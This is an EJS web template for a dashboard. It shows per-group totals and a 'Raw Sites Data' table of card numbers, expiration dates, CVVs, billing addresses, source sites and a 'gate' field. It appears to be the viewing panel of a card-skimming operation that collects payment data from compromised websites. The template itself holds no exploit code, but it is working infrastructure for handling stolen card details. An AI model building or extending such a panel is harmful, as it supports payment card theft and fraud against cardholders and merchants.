<%- include('./partials/head') %> <%- include('./partials/navbar') %>

Stats by <%= groupBy %>

<% if (stats && stats.length) { %>

Grouped Stats

<% stats.forEach((item) => { %> <% }) %>
<%= groupBy.toUpperCase() %> Total
<%= item[groupBy] %> <%= item.total %>
<% } else { %>

No statistics found.

<% } %> <% if (totalPages > 1) { %> <% } %>

Raw Sites Data

<% if (sites && sites.length) { %>
<% sites.forEach((s) => { %> <% }) %>
ID Site Cardnumber Expiration Cvv Address City State Zip Country Date
<%= s.id %> <%= s.site %> <%= s.cn %> <%= s.cexp %> <%= s.cv %> <%= s.adr %> <%= s.ct %> <%= s.st %> <%= s.zp %> <%= s.gate %> <%= s.created_at %>
<% } else { %>

No site entries found.

<% } %>